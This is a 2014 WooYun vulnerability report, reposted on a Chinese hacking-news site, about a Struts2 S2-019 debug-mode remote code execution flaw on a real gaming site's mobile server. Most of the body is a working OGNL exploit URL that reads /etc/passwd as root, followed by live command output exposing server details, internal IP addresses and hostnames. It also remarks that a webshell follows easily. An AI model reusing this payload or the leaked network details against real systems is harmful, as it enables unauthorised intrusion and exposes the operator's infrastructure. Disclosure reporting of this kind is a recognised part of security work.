记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

奇客星空development mode配置错误漏洞导致命令执行(root权限)

2014-04-20 01:05

#1.看到奇客星空的确认漏洞如此活跃速度,于是乎就想给它挖几个漏洞,看了下奇客星空的漏洞史,偶然间看到: WooYun: 奇客星空代码执行导致分站沦陷 这个漏洞,漏洞中提到的是Struts2框架的漏洞,和我现在提交的完全不一样,并且厂商在回复中答道:已修复。为了证明厂商已经修复struts2的漏洞,特上此图:

URL:http://m.7k7k.com/about.html 这是手机版的奇客星空吧 (⊙_⊙)?



01.jpg





#2.然后想到看看有没有开debug模式试试最新的St2-019的漏洞【Apache Struts 2.3.15.2之前版本的“Dynamic Method Invocation”机制是默认开启的,仅提醒用户如果可能的情况下关闭此机制,这样就存在远程代码执行漏洞,远程攻击者可利用此漏洞在受影响应用上下文中执行任意代码。】,于是测试一下悲剧了→_→

EXP:http://m.7k7k.com/about.html?debug=command&expression=%23f=%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29,%23f.setAccessible%28true%29,%23f.set%28%23_memberAccess,true%29,%23req=@org.apache.struts2.ServletActionContext@getRequest%28%29,%23resp=@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29,%23a=%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b=%23a.getInputStream%28%29,%23c=new%20java.io.InputStreamReader%28%23b%29,%23d=new%20java.io.BufferedReader%28%23c%29,%23e=new%20char[1000],%23d.read%28%23e%29,%23resp.println%28%23e%29,%23resp.close%28%29



02.jpg



还是root权限 =_=|

03.jpg





漏洞证明:

#3.

cat /etc/passwd/



root:x:0:0:root:/root:/bin/bash

bin:x:1:1:bin:/bin:/sbin/nologin

daemon:x:2:2:daemon:/sbin:/sbin/nologin

adm:x:3:4:adm:/var/adm:/sbin/nologin

lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin

sync:x:5:0:sync:/sbin:/bin/sync

shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown

halt:x:7:0:halt:/sbin:/sbin/halt

mail:x:8:12:mail:/var/spool/mail:/sbin/nologin

uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin

operator:x:11:0:operator:/root:/sbin/nologin

games:x:12:100:games:/usr/games:/sbin/nologin

gopher:x:13:30:gopher:/var/gopher:/sbin/nologin

ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin

nobody:x:99:99:Nobody:/:/sbin/nologin

dbus:x:81:81:System message bus:/:/sbin/nologin

vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin

abrt:x:173:173::/etc/abrt:/sbin/nologin

haldaemon:x:68:68:HAL daemon:/:/sbin/nologin

ntp:x:38:38::/etc/ntp:/sbin/nologin

saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin

postfix:x:89:89::/var/spool/postfix:/sbin/nologin

sshd:x:74:74:Privilege-separated SSH:/var/



uname -a

Linux Ct-gc-bj136 2.6.32-279.el6.x86_64 #1 SMP Fri Jun 22 12:19:21 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux null



ifconfig -a

eth0 Link encap:Ethernet HWaddr 00:16:3E:13:E2:A4

inet addr:115.182.59.136 Bcast:115.182.59.255 Mask:255.255.255.0

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:19472163956 errors:0 dropped:0 overruns:0 frame:0

TX packets:182413747 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:1324808432359 (1.2 TiB) TX bytes:80369708814 (74.8 GiB)



eth1 Link encap:Ethernet HWaddr 00:16:3E:34:0A:4D

inet addr:192.168.11.136 Bcast:192.168.255.255 Mask:255.255.0.0

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:1446599118 errors:0 dropped:0 overruns:0 frame:0

TX packets:1016118809 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:490211357961 (456.5 GiB) TX bytes:473975578474 (441.4 GiB)



lo Link encap:Local Loopback

inet addr:127.0.0.1 Mask:255.0.0.0



cat /etc/hosts



127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4

::1 localhost localhost.localdomain localhost6 localhost6.localdomain6



115.182.59.176so.7k7k.com

192.168.11.108 Ct-bj108

192.168.11.31Ct-bj31

192.168.11.136 Ct-gc-bj136

127.0.0.1 top.7k7k.com

192.168.11.149 api.cms.7k7k.com



115.182.59.250 s.7k7k.com

115.182.59.251 s.7k7k.com

115.182.59.252 s.7k7k.com

修复方案:

PS:漏洞详情请参考:http://struts.apache.org/release/2.3.x/docs/s2-019.html,有了命令执行还怕没Webshell吗,证明一下漏洞的严重性就好,希望厂商给一个高分rank,求礼物哇=_=,第一次合作,后期再去给你找几个漏洞。


知识来源: www.wooyun.org/bugs/wooyun-2014-052891

阅读:647998 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“奇客星空development mode配置错误漏洞导致命令执行(root权限)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云